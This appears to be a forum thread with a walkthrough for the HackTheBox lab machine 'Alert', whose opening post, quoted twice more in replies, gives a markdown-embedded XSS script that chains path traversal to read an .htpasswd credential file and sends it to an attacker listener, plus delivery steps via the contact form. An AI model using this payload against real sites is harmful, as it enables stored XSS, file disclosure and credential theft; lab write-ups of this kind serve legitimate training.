HTB alert (user)
by SSKK - Thursday November 28, 2024 at 05:44 AM
RaidForums
Member
Posts: 17
Threads: 1
Joined: Sep 2023
Reputation: 0

#1
11-28-2024, 05:44 AM (This post was last modified: 11-28-2024, 05:51 AM by SSKK.)
upload this md file to the alert.htb

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.xx.xx:80/?file_content=" + encodeURIComponent(data));
  });
</script>

On localhost  -->
python3 -m http.server 80

after clicking on View Markdown click on Share Markdown

then copy the link of that shared markdown url and paste it in the Contact Us page and send it.

you'll get something like this [Image: Screenshot.png]


doneeeee
Reply
RaidForums
Member
Posts: 30
Threads: 0
Joined: Feb 2024
Reputation: 0

#2
12-04-2024, 12:52 AM
thanks for the post explaining this! was stuck here for a bit.
Reply
RaidForums
Member
Posts: 4
Threads: 0
Joined: Jun 2024
Reputation: 0

#3
01-03-2025, 08:41 PM (This post was last modified: 01-03-2025, 08:43 PM by mrtyry3132123.)
(11-28-2024, 05:44 AM)SSKK Wrote: upload this md file to the alert.htb

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.xx.xx:80/?file_content=" + encodeURIComponent(data));
  });
</script>

Hi! How did you discover LFI vulnerability in 'http://alert.htb/messages.php?file='?
Reply
Banned

Posts: 28
Threads: 0
Joined: Jun 2024
Reputation: 0

#4
01-31-2025, 10:16 AM
(11-28-2024, 05:44 AM)SSKK Wrote: upload this md file to the alert.htb

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.xx.xx:80/?file_content=" + encodeURIComponent(data));
  });
</script>

On localhost  -->
python3 -m http.server 80

after clicking on View Markdown click on Share Markdown

then copy the link of that shared markdown url and paste it in the Contact Us page and send it.

you'll get something like this [Image: Screenshot.png]


doneeeee

Thanks man, much appreciated
Ban reason: Leeching | http://breachddyfwvcp4kzccos5oxtdbssmfbp...an-Appeals if you feel this is incorrect. (Permanent)
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 88,710 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 2,348 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 7,490 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 350 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 646 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 1 Guest(s)